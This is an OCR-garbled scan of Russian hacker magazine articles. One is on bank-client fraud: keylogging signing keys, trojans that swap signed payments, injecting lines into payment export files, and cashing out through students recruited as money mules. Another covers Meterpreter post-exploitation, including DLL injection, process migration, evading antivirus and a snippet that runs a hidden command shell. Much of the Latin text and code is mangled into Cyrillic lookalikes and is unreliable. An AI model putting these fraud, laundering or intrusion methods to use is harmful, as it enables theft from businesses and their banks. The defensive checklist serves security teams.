исполнять. РОР помогает не только с йРР, но и сА5І_Р,так 
как весь код для РОР-про граммы заимствован из библиотеки 
«ісиспѵ34.бИ», которая скомпилирована без поддержки А5І_Р, 
а значит, этот эксплойт работает даже в ѴѴіпсІоѵѵз 7. Опробовать 
эксплойт можетлюбой желающий, ибо он включен в состав 
Меіазріоіі — вперед! 



50ШТІ0М 



Последняя версия Аб обе АсгоЬаІ: Реасіег с исправленной уязви- 
мостью уже вышла. т- 



ХАКЕР 1 1 /142/ 10 



► 049 








Фатальные ошибки в банковском ПО 

© Киберпреступность - это не вымысел и не пугалки для различных 
клиентов с целью развести их на покупку чего-либо (ІР$, АпІіѴігиз, пен- 
тест); к сожалению, в нашей стране это объективная реальность, 
которую нужно воспринимать как есть. Сегодняшняя статья будет 
посвящена киберпреступникам и их методам увода денег. 

МЫ НЕ БУДЕТ ГОВОРИТЬ О КРЕДИТКАХ, ѴѴЕВМОЫЕѴ И РАѴРАІ., А Банк-Клиент 

ПОГОВОРИМ О ДРУГОМ ДЕПАРТАМЕНТЕ КИБЕРПРЕСТУПНОСТИ, В век высоких технологий глупо работать с бумажками, ходить в банк, 

КОТОРЫЙ ОПУСТОШАЕТ СЧЕТА В БАНКАХ. ВЕСЬ ТЕКСТ ОСНОВАН чтобы подписывать их, и делать таким образом денежные перево- 

НА ЛИЧНОМ ОПЫТЕ АВТОРА, КОГДА ОН РАБОТАЛ В БАНКЕ, А ды партнерам по бизнесу. Средние по размеру фирмы в день могут 

ИМЕННО — ПРОВОДИЛ РАССЛЕДОВАНИЯ ИНЦИДЕНТОВ, И ПРО- проводить от трех до сотни таких операций, поэтому неудивительно, 
СТО НА ОПЫТЕ РАЗЛИЧНЫХ ПЕН-ТЕСТОВ БАНКОВ И АНАЛИЗЕ что все это делается через интернет. Системы, которые дают клиенту 

БАНКОВСКОГО ПО. доступ к его счету в банке, называются ДБО (дистанционное банков- 
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пІег-РВО от Сигнал-КОМ — локальный ВоР 

ское обслуживание), или просто «банк-клиент». Как это работает: 
банк устанавливает у себя ПО, работающее с БД, где можно рулить 
деньгами на счетах. Кроме этого ставится сервер с доступом в инет. 
Любой клиент может использовать этот сервис (предварительно 
пройдя аутентификацию), чтобы получить доступ к своему счету и 
отправить деньги куда угодно. Отправка денег выглядит как забивка 
текста в специальные формы — там указывается получатель перевода 
(счет, ИНН и т.д.), с какой целью и сколько, собственно, денег отправ- 
ляется и еще много чего подобного. Это называется «платежное 
поручение». Далее операционист банка (сотрудник) просматривает 
все накопившиеся платежные поручения и жмет кнопку «ОК», после 
чего ПО снимает деньги со счета пользователя в БД и формирует 
файл/запись в БД/иное указание для банка, куда отправляются день- 
ги. Потом происходит возня с обработкой корр-счетов между бан- 
ками, чтобы переправить деньги на нужный счет, но все это уже не 
так интересно. Тут в дело вступает наше законодательство и правила 
Центробанка (самый главный банк страны). В частности, при работе с 
юридическими лицами (фирмы, компании, корпорации и т.д.) требует- 
ся, чтобы платежные поручения были заверены цифровой подписью. 
Но не простой, а единственно правильной — на ГОСТ’овском алго- 
ритме. В итоге операционист получает только те платежки, подпись 
которых проверена, далее он смотрит назначение платежа, его опи- 
сание и жмет «ОК». После этой фазы можно не сомневаться — деньги 
дойдут куда нужно. Итак, как это выглядит: 

1. Аутентификация в системе Банк-Клиент; 

2. Формирование платежного поручения; 

3. Подпись (часто подписи надо ставить две — от бух- 
галтера и директора) ; 

4. Отправка в банк; 

5. Подтверждение платежки операционистом в банке; 

6. Банк осуществляет операцию. 

Это общее условное описание действий. На самом деле многое зави- 
сит от типа банк-клиента, от правил банка и т.д. и т.п. 

Классификация 

Системы ДБО бывают разными, и поэтому работа с ними тоже протекает 
по-разному. Проведу быструю классификацию: 

• Толстый Банк-Клиент 

• Тонкий Банк-Клиент 

• Интернет-Клиент 

• Мобильный-Клиент 

• АТМ- Клиент 

Толстый 

Этот мамонт — прародитель системы, используется издревле, но до 
сих пор. Его особенность в том, что пользователь системы работает с 
БД локально! Это означает, что копия его счета лежит у него в файле, 




Процесс формирования электронной подписи ГОСТ Р 
34.10 2001 (Автор: Алексей Бузмаков) 



и он аутентифицируется локально в БД, а там с помощью выданного 
банком ПО он и работает — создает платежки. Потом он соединяется 
сервером банка — по модему напрямую или через интернет, базы 
синхронизируются, подписи проверяются, и клиент может обрубать 
соединение и смотреть, что и как синхронизировалось, какие платеж- 
ки ушли, какие нет, и сколько денег у него осталось. 

Тонкий 

Клиент работает со счетом из браузера. Это означает, что он работает 
уже через веб-интрефейс (иногда через специальный интерфейс на 
^ѵа) и локальной базы у него нет, но, тем не менее, ему накатыва- 
ются плагины к браузеру в виде ^ѵа-апплетов или АсбѵеХ, чтобы 
делать подписи (электронная подпись ставится локально, так как 
секретный ключ находится у клиента). Зачем АсбѵеХ? Затем, что в 
ѴѴіпбоѵѵз по умолчанию нет криптопровайдера для подписи согласно 
ГОСТ. Поэтому необходимо дополнительное ПО, которое будет ставить 
подпись по всем законам. 

Интернет-Клиент 

То же самое, что и тонкий, только тут я его выделил в отдельную груп- 
пу, так как никаких АсбѵеХ не ставится, а используются одноразовые 
пароли или иные приблуды без установки ПО от банка. Такое чаще 
всего реализовано для физических лиц, которым электронная под- 
пись не нужна. 

Мобильный 

То же, что и интернет, только подтверждение платежа происходит с 
помощью мобильного телефона. Например, с помощью посылки на 
телефон одноразового пароля. 

АТМ 

Работа со счетом осуществляется через банкомат. 

Юридические лица — компании, фирмы, государственные учрежде- 
ния и т.п. используют в большинстве своем толстые и тонкие БК. При 
этом еще остались мамонты, которое работают по телефонной линии 
через модем. Но наибольшую популярность набирают именно тонкие 
клиенты, так как они легче в установке и эксплуатации. 

Юрики 

Итак, почему юридические лица? Во-первых, у них большой поток 
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взлом 








На сайте фактуры, на странице входа в БК — мини- 
мальный список правил ИБ, неплохо бы их соблюдать, 
товарищи 

денег и множество переводов в сутки. Если добавить одну маленькую 
платежку, ну, скажем, на один-два миллиона рублей, то такая пла- 
тежка на фоне остальных не вызовет подозрения у операциониста. 

И потом, у юридических лиц нет подтверждения через мобильники 
и прочей лабуды, что напридумывали для физических лиц взамен 
электронно-цифровой подписи (ЗЦП) на платежку (у них только ЭЦП). 
Следующий фактор — больше возможностей для маневра и взлома. 
Фактически, взламывая ЛЮБУЮ фирму или компанию, можно смело 
утверждать, что где-то там в локалке есть компьютер с установленным 
банк-клиентом. Более того, в действительно больших фирмах финан- 
систы, которые от имени фирмы осуществляют платежи, имеют дого- 
воры сразу с НЕСКОЛЬКИМИ банками и БК соответственно, более 
того, они же не придумывают и, тем более, не знают, что именно они 
делают. Что я сейчас сказал? :) Вот именно — не знают. В большин- 
стве случаев такие операторы просто получают ТЕКСТОВЫЙ ФАЙЛ 
без подписи из 1С или из ЕРР-системы со списком, куда, сколько 
отправить, что они уже и выполняют в БК. 

ЭЦП 

Вкратце: подпись — это результат хеш -функции от текста платеж- 
ки, «зашифрованной» на закрытом ключе клиента. Банк, получая 
платежку, проверяет хеш от текста полученной платежки, потом 
«расшифровывает» подпись открытым ключом клиента и сверяет 
результат. Если хеши совпали, значит, это действительно платежка от 
клиента, и текст платежки достоверен. Решаются задачи целостности, 
идентификации клиента и, кроме того, сам клиент потом НЕ МОЖЕТ 
отказаться от этой платежки, так как она подписана верным ключом. 
Дело в том, что между банком и клиентом подписывается договор, 
согласно которому все платежки с верной ЭЦП банк должен отправ- 
лять. Поэтому, если кто-то украдет ключ пользователя, подпишет 
платежку, то банк обязан исполнить ее, выполняя денежный пере- 
вод, куда сказано. И если клиент потом пойдет с претензиями, что, 
мол, это не я отправлял, банк покажет договор, покажет бумажки о 
генерации ключа, о признании этого ключа клиентом, о том, что ключ 
был верный, и что денег клиенту он не должен. Короче, сам потерял 
ключ — сам и виноват, банк ничего возмещать не обязан (хотя может, 
если клиент ему дорог и сумма небольшая). ПО, работающее с ЭЦП 
по ГОСТу, у нас гордо зовется «Система Криптографической Защиты 
Информации» (СКЗИ). Такое ПО проходит проверку ФСБ, и на него 
выдаются соответствующие сертификаты! Алгоритм подписи — ГОСТ 
Р 34.10 2001 . При этом алгоритм хеш-функции — ГОСТ Р 34.1 1-94. 
Разбирать и ломать криптографию никому не надо, ведь ключ можно 
украсть или использовать прямо на месте. 

ІІ$В-Токеп 

Многие банки, интеграторы-безопасники и т.д. говорят, что 115В- 
Токеп защитит всех нас от хищения ЭЦП. Что же такое ІІЭВ-Токеп? 
Это железка в виде ІІЭВ-устройства, внешне похожего на обычную 
флешку. Внутри этой «флешки» прошит секретный ключ и микро- 





Демо-версии ПО доступны всем желающим 

схема, которая принимает на вход данные, подписывает их по 
ГОСТу внутри себя (с помощью ключа) и на выход обратно кидает 
уже подпись. Это достаточно круто, ведь тогда ключ нельзя ско- 
пировать и украсть. Но, к сожалению, можно просто подменить 
входные данные или вообще поставить жертве Р-Абтіп, а можно 
и туннелировать трафик ІІВВ на машину злого хакера. В общем, 
все это — не панацея, а недавние реализации зловредов уже 
включали в себя такой функционал. Так что ІІЭВ-Токеп просто сни- 
жает риски. Это все, что про него можно сказать. Хотя есть более 
крутые Токеп’ы с одноразовыми паролями и т.д., но массового 
внедрения пока нет, да и слабые места в виде перехвата ввода 
пароля и использование его для подложной платежки также воз- 
можны. Защита клиента должна включать в себя целый комплекс 
мер: сегментация физическая, логическая, удаление ненужного 
функционала, ограничение доступа в интернет, ключевая полити- 
ка, парольная политика, патч-менеджмент, антивирусная защита и 
все в таком духе. 

Грабим караваны 

Зная, как вся это каша работает, рассмотрим теперь, как нехорошие 
люди уводят деньги. История номер один: 

Береги ѴѴіРі смолоду 

Срочное расследование инцидента показало, что в среду утром (на 
более ранее число логов не сохранилось) к офису одной компании 
в Петергофе подключились по ѴѴіБі (шифрование ѴѴЕР, так что я 
использовал слово «подключились»... о том, что по ѴѴіРі, ясно из 
МАС-адреса, который говорил о ЗСот-устройстве, а в компании нет 
ни одной ЗСот-карточки, что говорит о том, что нарушитель скорее 
внешний, так как внутри офиса заметили бы новый девайс или ноут). 
Далее злоумышленник что-то делал, но что — не ясно, ибо логи были 
в очень ограниченном числе с определенных серверов, но буквально 
к вечеру с этого ІР-адреса уже использовалась админская учетная 
запись домена (не сильный админский пароль -> АРР-5Р00Е -> 
НАЗН+СОЫЭТ бапсізбаке-^ РапіЬоѵѵ-ТаЫе ргоП!). За это время 
ребята смогли найти машины, работающие с банком, что было 
несложно, ибо пеібіоз и доменные имена машин в локалке были 
вида: ВАІМК01, ВАІМК02. Имея админскую учетку, нетрудно захватить 
контроль над тачкой, установить кейлогер и стырить ключи от банка, 
ведь ключи-то были на флэшке... Через день негодяи попытались 
осуществить перевод денег. Они нашли ѴѴіЕі-точку, поднятую без 
шифрования в жилом доме, в квартире. Злоумышленники вышли в 
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Компания-производитель ПО предупреждает пользо- 
вателей о фактах использования злоумышленниками 
ІІЗВ-токеп'ов, оставленных в системниках 

интернет, подключись к нескольким системам банк-клиент, ввели 
логины и пароли, которые добыли с кейлогера — вошли в систему. 
Далее они набили платежки (практически одновременно, что гово- 
рит о том, что злоумышленники действовали в числе 2-3 человек с 
одного ѴѴіРІ-шлюза, видимо, из автомобиля) и подписали их ключами, 
которые прихватили с собой позавчера с флехи. Только чудом удалось 
избежать потерь — один из банков что-то заподозрил и сообщил кли- 
енту, клиент тут же проверил остальные БК, нашел левые платежки и 
успел их отменить. Но такое случается не всегда. 

Выводы: безопасность внешнего периметра, парольная политика, 
сегментация сети, неиспользование прозрачных имен машин, вывод 
критичных машин из общего домена, неиспользование флешек и 
НОй для хранения ключевой информации. Про антивири, ЮЗ и при- 
вязку ІР компании к счету я молчу, ибо это полезно, но не всегда 
действенно. 

История номер два 

В небольшой компании бухгалтер сам отправляет платежки. Он любит 
это делать с ноута, а также этот ноут он использует как домашний и 
рабочий компьютер. Однажды, проверяя почту, он увидел письмо, в 
котором говорилось, что они что-то там не уплатили по счету некой 
строительной компании. И вроде да... недавно они что-то заказывали 
по ремонту, но наш герой уже не помнит деталей. Письмо составлено 
нормально, нигде нет ничего палевного, что и логично, автор письма 
знаком с основами СИ. Так вот, бухгалтеру нашему надо вспомнить, 
что это за строительная компания такая, а то подозрительно как-то. 

О, да тут в письме, в подписи, есть линк на сайт компании... Дальше 
все понятно, ехріоіі-раск, АсгоЬаІ Пеабег, спец-троян для БК. Дальше 
история может быть аналогична предыдущей. Социальная инжене- 
рия, отсутствие патч-менеджмента и отсутствие правил безопасности 
и простейших политик. Такие истории случаются довольно часто. 
Добавлю еще один, как мне кажется, интересный вариант — внедре- 
ние платежки в БД или в экспорт из БД. Поясню: в больших компани- 
ях происходит так много различных операций со счетами, что за всем 
сложно уследить. Поэтому автоматизация процесса выглядит так. 
Каждый отдел что-то покупает, что-то заказывает и что-то оплачивает. 
У него есть доступ к ЕПР-системе (ну или 1 С, для России актуальнее), 
где он (работник отдела) обозначает, что ем у (как обычно, по работе) 
надо докупить, например, туалетной бумаги на 700 тысяч рублей. В 
другом отделе оплачивают аутсорсинг компании, которая занималась 
И Б, в третьем считают что-то еще. И у каждого ответственного работ- 
ника своя учетная запись в системе, где он по своему роду деятель- 
ности выполняет различные действия. Все это хранится в БД, прове- 
ряется бухгалтером или еще кем-то, и затем скидывается, например, 
в обычный текстовый файл на расшаренном ресурсе. Работники 
отдела, где занимаются работой с банк-клиентами, просто открывают 




этот текстовый файл и построчно выполняют переводы в системе БК. 
Это, опять же, упрощенная схема, но если нет должного внимания к 
самому слабому звену — БД и расшаренному ресурсу, то ничего не 
мешает добавить в этот текстовый файл или БД еще одну-две строч- 
ки :). При набивке платежки в БК работник просто не поймет, в чем 
дело, и отправит еще и злоумышленнику деньжат... Конечно, всего 
этого можно избежать, делая дополнительные проверки и грамотно 
выставляя права в БД, сетевых дисках и т.д. 

Опасная профессия 

Понятное дело, что для банк-клиентов используются специали- 
зированные трояны, которые умеют работать с ЭЦП (с 115В- 
токенами), с одноразовыми паролями, виртуальными и обычными 
клавиатурами и т.д. и т.п. Трояны эти так просто с Сети не скачать 
— их приобретают у «производителя» и затачивают под конкрет- 
ные банки (подробнее о рынке можно было прочитать в ][ #112, 
статья «Услуги кардеров»), К примеру, троян/руткит не только 
тырит все, что введено, но и подменяет контент сайта банка. То 
есть, забиваешь ты платежку, жмешь кнопку «подписать», а на 
самом деле в ІІ5В-Токеп уходит другая платежка с другим получа- 
телем, которую ты и подписал, однако на экране компьютера все 
по-прежнему выглядит невинно и отображены все те данные, что 
ты ввел (однако в банк уходят другие данные). Такие трояны стоят 
очень дорого и применяются конкретно под определенную цель. 
Как правило, те, кто ломают клиента и воруют, и те, кто пишут 
троян — разные люди. Кроме прочего, после перевода деньги еще 
надо снять. Самый простой вариант увода — попросить каких- 
нибудь студентов зарегистрировать счет и карту, скажем, за пять 
тысяч рублей. Правильно выбранный студент не откажется от тако- 
го. Далее забираешь карточку и пин-код, потом, в выбранный день 
N. осуществляются переводы со взломанных клиентов на счет, 
который зарегистрировал студент. Далее ездишь по банкоматам и 
сливаешь с карточки наличные. Это, конечно, грубая и не всегда 
эффективная модель вывода, но при маленьких суммах или боль- 
шом количестве студентов и дропов — реальная. В общем-то наши 
доблестные органы ловят в основном дропов, до организаторов 
сложно добраться, и они могут находиться очень далеко, скажем, 
на Украине или в Польше :). Или наоборот, дропы сливают нал 
в Болгарии, а хакеры (злые, плохие ребята, а не крутые добрые 
белые шляпы) работают в Новосибирске. При таком географиче- 
ском разбросе вычислить следы сложно, особенно если у органи- 
заторов есть крыша. Ну, ты понял, что дело это опасное и нехоро- 
шее, у каждого в нем своя роль, но все это уголовно наказуемо! 

Не клиентом единым 

К слову, ломать могут не только клиентов, но и сам банк. Казалось 
бы, это нереально, но тут есть, где развернуться — последний опыт 
пен-тестов показал, что нашим разработчикам систем есть куда 
развиваться. В разное время и в разных системах был найден 
классический набор ошибок: Х55-, 50І_-инъекции, логические 
ошибки доступа, отсутствие шифрования критичных данных и т.д., 
и т.п. Примеры векторов атак при этом могут быть разными, но 
основа все-таки почти всегда полу-инсайдерская. Дело в том, что 
если у тебя уже есть доступ к БК, то есть, фактически, ты — клиент 
банка, то возможностей по взлому самого банка у тебя на порядок 
больше, нежели ты был бы простым внешним пользователем. Мой 
любимый пример логической ошибки: хочешь ты перевести рубли 
в доллары, БК предоставляет такой функционал, у тебя, соот- 
ветственно, два счета — валютный и наш, деревянный. Скрипт 
перевода выглядит так: на вход сумма в рублях и валюта. На 
выходе — сумма в рублях, текущий курс, сумма в долларах и хеш. 
После подтверждения пользователем, что он согласен на перевод, 
это все кидается в третий скрипт, который проверяет хеш (это от 
С5РР) и обрабатывает ввод, делая ирсіаіе в БД. Так вот, на втором 
шаге можно изменить курс доллара на более выгодный, а второй 
скрипт уже не проверяет курс... Это пример логической ошибки. 
Описывать ЗОБ- инъекции и Х55 не смысла — все уже знакомы с 
таким видом дырок... 
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Осіау 

Но вернемся к клиенту, так как он все-таки более частая жертва. Два 
года назад, когда я работал в одном питерском банке, мне было так 
скучно, что я решил поковырять АсбѵеХ популярного банк-клиента на 
предмет уязвимостей (В55). Фаззинг ничего не дал, так как формат 
принимаемых данных был сложным, но так как время у меня было, я 
просто медленно и верно восстанавливал формат входных данных. 
Когда формат был восстановлен, я указал очень большой параметр 
в текущем формате. Итог банален — переполнение буфера. Тогда я 
проверил еще два популярных коробочных продукта (Іпізі, Р-5іуІе). 

И там уже банальным фаззингом нашел как переполнения буфера, 
так и небезопасные методы в АсбѵеХ (вспоминаю сейчас доклад 
на СС’10 Алексея Трошичева про фаззинг в процессе разработки 
и вопросы программистов из зала на тему «нафиг это надо?». Вот 
ответ. Хотя анализ исходных кодов — также вещь необходимая и 
важная). И вот прошло два года, и я решил просмотреть еще один 
АсбѵеХ, который не досмотрел тогда, естественно, отечественный 
и популярный — Ракіига.ги от ЦФТ :]. Фаззинг ничего не дал (как и 
два года назад). Но в этот раз я привлек банальную внимательность, 
которая никогда не повредит. И вуаля — было найдено переполне- 
ние буфера в одном свойстве, которое эксплуатировалось только 
в связке с другими свойствами и методами... Понятное дело, что 
фаззеры неэффективны, когда формат данных или последователь- 
ность вызовов нетривиальна. Так получилось, что четыре из четырех 
АсбѵеХ, которые я посмотрел «чисто из любопытства», содержали 
критические уязвимости (сейчас все исправлено, слава Б5есР6, 
политика которых заключается в бесплатном уведомлении отече- 
ственных разработчиков без распространения технических деталей 
в публикациях). При этом стоит учесть, что два банк-клиента сдались 
простейшему фаззеру АсбѵеХ, что говорит о том, что злые парни 
тоже могли бы их найти (в отличие от других двух, где фаззеры не 
дали результатов). Но это еще не все — я решил глянуть на СКЗИ 
и его окружение, вернее, на ІпІег-РРО от Сигнал-КОМ — клиент- 
серверное приложение, отвечающее за передачу данных по сети. 
Само приложение содержит вшитый модуль СКЗИ, который сертифи- 
цирован ФСБ (чтобы шифровать, не нарушая закон). Так вот, данное 
ПО содержало аж три уязвимости (и мы уже говорим не про АсбѵеХ, 
а про полноценное клиент-серверное ПО). Одна из ошибок удален- 
ная (в серверной части) и фактически позволяет «отключить» любой 
банк, который использует у себя ІпІег-РРО (ОоЗ). Риски снижаются 
за счет того, что «отключить» банк может только законный пользо- 
ватель банка, имеющий валидный ключ (любой клиент), а не каждый 
встречный-поперечный. Одна из уязвимостей была и в клиенте — 
переполнение буфера с возможностью выполнения произвольного 
кода (для этого вектора атаки надо иметь доступ на запись к файлам 
клиента или подсунуть свой файл, что, опять-таки, сильно снижает 
вероятность реальных атак). В любом случае, такие ошибки в крити- 
ческом продукте — неприятность. Добавлю, что из всех производи- 
телей лишь ПО от Сигнал-КОМ использовало защитные механизмы 



компилятора — /05 (понятно, что есть пути обхода 65, но в данном 
билде они были неприменимы, и это позволило лишь выполнить 
удаленный Бо5 вместо бобе Ехесибоп). Было бы хорошо, если бы 
такие слова, как Регтапепі БЕР, А5БР, 5ЕН0Р, 65 были знакомы 
всем программистам, ведь в связке эти штуки способны сильно- 
сильно поломать планы злым хакерам. Пример — все тот же Іпіег- 
РР6 — если бы не 65, то была бы печальная история, а так — про- 
сто невнимательность и неприятность. Добавлю, что пользователь 
может знать об уязвимостях во ЕІазЬ, АсгоЬаІ Реабег, ѴѴіпбоѵѵз и 
т.д., но про уязвимости в отечественном продукте он не узнает — 
никто этим не занимается, на этом баг-хантерам денег не сделать 
(бывают исключения, но они скорее другого рода). 

Финиш 

Каковы же правила выживания? Да просты они, как и всегда, многое 
уже прозвучало и не один раз в тексте статьи, многое итак очевидно, 
но кое-что и не особо, так что я соберу все в одном абзаце. 

1) Сегментация — компысБКв отдельной подсетке; 

2) Политика пользования — должны быть правила по работе с 
этими ПК; 

3) Антивирусная защита; 

4) Ключевая политика — использование ІІ5В-токеп’ов и правила 
их использования также важны — не оставлять токен все время в 
системнике — это приводит к хищению денег! 

5) Парольная политика — разные юзеры — разные сложные паро- 
ли и все в таком духе; 

6) ПК, его софт, процессы и порты должны быть обоснованы для 
использования. Все лишнее — в топку; 

7) Фильтрация доступа на сетевом уровне - с БК машин могут 
ходить только на ІР банков и на определенные порты, входящий тра- 
фик запрещен (динамическая фильтрация входящих пакетов); 

8) Патч-менеджмент; 

9) Аудит — важный шаг, чтобы понять, можно ли в БД или в выгру- 
зочном файле подсунуть платежку. БД тут — вообще тонкий момент; 

10) Проверка внешнего периметра; 

11) Для ТОЛСТЫК БК — проверка, что локальная БД не светится в 
локалку, нет паролей по умолчанию. 

Для банков я ничего писать не буду, они там сами умные — раз- 
берутся, в любом случае всегда страдает пользователь, поэтому он 
должен сам беспокоиться о своем БК, ключах, паролях и безопас- 
ности. Не было сказано про интернет-и мобильные клиенты, а также 
АТМ-клиенты, но для первых двух атаки почти идентичны, за исклю- 
чением некоторых деталей, а АТМ-клиент — совсем другая история, 
бтдельной проблемой стоят вопросы об ошибках в отечественном ПО. 
Как показали мои опыты, уязвимости можно найти даже в банков- 
ском П6, которое изначально должно было разрабатываться с учетом 
вопросов безопасности. ..□с 
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МЕТЕкРкЕТЕК 
В ДЕЛЕ 

Хитрые приемы через МБР 

ѳ Сегодня мы опять поговорим о такой прекрасной вещице, как 
Меіазріоіі Ргашеѵѵогк. А если точнее, то о пасынке МЗР - «нагрузке» 
Меіегргеіег. Зто реально асіѵапсесі рауіоасі с учетом всего, что туда 
вложено, а также того, что мы можем сделать своими ручками. 



ОДИН ВАЖНЫЙ МОМЕНТ О М5Р И МЕТЕКРКЕТЕВ'Е В ЧАСТНОСТИ 
(ХОТЯ И В МЕНЬШЕЙ СТЕПЕНИ) — проект развивается быстрыми 
шагами, и к выходу статьи какие-то вещи могут уже достаточно 
сильно измениться. Например, недостатки в новом тзТдиі, о кото- 
рых я писал в прошлом номере. За пару недель тзРдиі сильно 
изменился и быстренько оброс всеми необходимыми возможностя- 
ми старого гуи и даже больше :]. 

Думаю, каждый, кто использовал М5Р, хотя бы раз прикасался к 
Меіегргеіег’у (МР) и что-то знает о его внутренностях или возмож- 
ностях. Но я все же коротко поведаю о нем и о том, зачем он нужен. 

Что это такое? 

Ме+егрге+ег — это нагрузка, задуманная в контексте МЗР как гиб- 
кая, расширяемая, полнофункциональная и унифицированная 
основа для пост-эксплуатации в качестве альтернативы класси- 
ческим шеллкодам. Вполне резонный вопрос — в чем проблема 
стандартного шелла (/Ьіп/зб, стсТехе)? Ведь мы с детства только и 
стремимся к тому, чтобы получить его :). Косяков с ним, на самом 
деле, много. Во-первых, чаще всего «получение доступа к шеллу» 

— это порождение нового процесса — самого шелла. Это очень 
заметно — косяк. Во-вторых, всяческие ЮЗ четко отлавливают 
«переписку» с шеллом: команды стандартны, все — плэйн-текстом, 
так что задетектить и пресечь — не проблема. В-третьих, если про- 
цесс ограничен сНгооРом, то есть смещена рутовая директория, то 



до шелла нам уже просто так не добраться. В-четвертых, шеллы, в 
зависимости от ОС, заметно отличаются между собой как коман- 
дами с их форматом, так и набором стандартных возможностей. К 
тому же наши возможности ограничены установленными у жертвы 
программами. Иначе не возникало бы стандартных вопросов типа 
«а как, имея доступ через виндовый шелл, закачать жертве фай- 
лик?». В общем-то, создатели МР и решили эти проблемы. А как 
же не решить? Целая толпа знаменитейших спецов приняла в этом 
участие :]. Но есть только одно «но». Насколько я знаю, они хотели 
сделать МР под все основные ОС с учетом требований скрытности, 
унифицированности и расширяемости. Но реализовали полностью 
только под ѴѴіпсІоѵѵз-системы (на самом деле это чудесно, так как 
доступ в стсТехе — это какая-то кривизна и издевательство над 
собой :). Под Ыпихуже кучу лет ведется разработка, но ни одного 
релиза еще не было. Под Мас’и в 2009 был представлен экспери- 
ментальный релиз от Сбагііе Міііег’а и Ѵіпсепго Іоно. Так что в этой 
статье мы будем говорить о ѴѴіп-версии МР (с парой исключений, 
но об этом ниже). Проблема порождения процессов была решена 
за счет использования технологии инжекта сИГок из памяти. Сам 
МР является многоступенчатым шеллкодом. То есть после проведе- 
ния атаки на какой-то процесс на машине жертвы сначала испол- 
няется шеллкод на подгрузку МР в виде сИГки, потом размещение 
этого процесса в адресном пространстве и запуск на исполнение в 
виде нового потока. Таким образом, МР и его расширения работают 
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Список импорта Ваіідип'а. Сюда смотрим, чтобы знать 
доступные функции и как в хелп при добавлении своих 



в контексте проэксплуатированного процесса в виде сІІГки — пото- 
му и без порождения новых процессов. Более точная последова- 
тельность работы МР как шеллкода зависит от технологии инжекта 
БІ_І_: классическая 611 і^’есііоп или ге^есбѵе 611 іпіесііоп. Последняя 
— более новая и продвинутая. Задетектить ее достаточно трудно, 
так как она себя никуда не прописывает (РЕВ) и хуков не использу- 
ет. Подробное описание технологий смотри по ссылкам на полях. 
Отсюда же решились проблемы с сЬгооБом и доступом к стандарт- 
ным программам/функциям — МР включает в себя большинство 
самых необходимых возможностей по взаимодействию с ОС. 
Например, загрузку/выгрузку файлов, редактирование файловой 
системы/реестра. Если чего-то в МР нам не хватает, то мы спокойно 
можем написать на любом языке свою сИГку с функциями, которые 
нам требуются, и подгрузить ее через МР — он действительно хоро- 
шо расширяем. Проблема «диалога плэйн-текстом» была решена 
вшитым в Меіегргеіег шифрованием хог’ом. Еще одним большим 
плюсом МР является возможность миграции по процессам. Для 
примера рассмотрим классическую ситуацию, в которой мы «ата- 
куем» браузер жертвы и юзаем Ьеар или ^І-спрэй для передачи 
управления нашему шеллкоду, а это, в свою очередь, вызывает 
неприличное пожирание памяти. Со стороны юзера это выглядит 
подвисоном браузера, который он, в свою очередь, попытается 
перезапустить. Для нас (со стандартным шеллом) закрытие при- 
ложения — это облом. Сотворить что-то дельное за пару секунд 
мы вряд ли сможем. Но с МР мы можем одной командой (ппідгаіе) 
быстренько переползти на другой процесс. Причем мы, во-первых, 
можем зайти на какой-нить крутой системный процесс (если права 
есть), который пользователь убить не сможет, а во-вторых, при 
любых миграциях мы не теряем связи — общение происходит 
через один и тот же сокет, новых соединений не создается. 
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Модификация .ЬазЬгс позволяет использовать русскую 
раскладку 

И, наверное, самый приятный бонус — возможности автома- 
тизации. Тут все так же, как и в самом МЗЕ. Все радости РиЬу, 
Меіегргеіег АРІ :). В общем-то, на них мы и сконцентрируемся. 
Стандартные же МР-команды и возможности типа Ьа5Митр’а 
достаточно просты и не требуют какого-то специфического опи- 
сания (да поможет нам «-И» :), к тому же в ][ было много об этом 
написано и до меня. 

Можно ли обнаружить? 

Так как МР работает только в памяти и ничего не пишет на жест- 
кий диск, то раньше нельзя было задетектить его антивирусами . 
Насколько сильно изменилась ситуация сейчас — мне трудно ска- 
зать. Но пара попсовеньких антивирей, с которыми я сталкивался 
недавно, не обнаруживали МР в памяти. В то же время появилось 
несколько проектов, которые разработали методики обнаружения 
МР и выпустили по ним небольшие концепт-тулзы. Например, пито- 
новская тулза апбте1;ег2 с тегівагіса.сот отлично справляется с 
обнаружением МР. 

Виды теіегргеіег'а 

Теперь об исключениях. Хотя я чуть выше и писал о том, что нор- 
мальный МР есть только под ѴѴіп, на самом деле это не совсем так. 
Как раз этим летом вышли две версии МР — на РНР и ^ѴА. Как 
так? Сам не понимаю :). 

На самом деле все достаточно просто. Это обычные шеллы, только 
заточенные под стандарты МР, и в этом их главный плюс. То есть 
РНР МР — это обычный рбр’шный шелл, который можно подкинуть 
на веб-сервер своей жертве через какую-либо уязвимость, будь 
то І_БІ или ЗОБ-инъекция. Здесь не говорится ни о сокрытии про- 
цесса, ни о сИІ-инжекте или отсутствии взаимодействия с жестким 
диском жертвы. Потому и такие возможности, как миграция по 
процессам, кража токенов, подгрузка расширений, недоступны. Но 
основные команды все же доступны, например, та же маршрути- 
зация пакетов. Поэтому в определенных ситуациях РНР и ^ѴА МР 
— вещи необходимые. 

Стандартные скрипты 

К МР, как уже было описано, можно писать скрипты на руби. 

Язык достаточно простой и логичный, сам по себе трудностей не 
вызывает. Одна заморочка — АРІ от Рех’а (основа М5Е) и основ- 
ных частей МЗЕ’а. АРІ можно посмотреть на сайте теіазріоіі’а 
(ссылки на полях), также есть старое (2004 г.) описание МР, про- 
токола клиент-серверного взаимодействия, его АРІ (лежит в доках 
ХітізІЭХбоситепІаІіоп). Там все несколько запутанно, особенно с 
учетом того, что какого-то полного описания внутреннего строения 
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Подгружаем Меіегргеіег через классическую уязви 
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Находим МР в проэксплуатированном процессе 



фрэймворка в Сети нет. Но для большинства наших задач особенно 
глубоко копаться и не нужно (хотя, если потребуется, то можно :). 

К тому же, есть положительные тенденции в этой области. Сейчас 
развивается и внутренняя структура, и интерфейсы для доступа к 
АРІ. Например, создаются функции обертки. И если раньше для 
скрытого запуска программы требовалось написать: 



г=с1іепк . зуз .ргосезз . ехесике ( " соттапб. ехе" , піі , 
{'Ніббеп' => кгие, 1 Скаппеіігеб 1 => кгие}) 
ѵбіі1е(б = г . скаппеі . геаб) 
ктроик « б 

епб 

стбоик « ктроик 
г . скаппеі . сіозе 
г . сіозе 



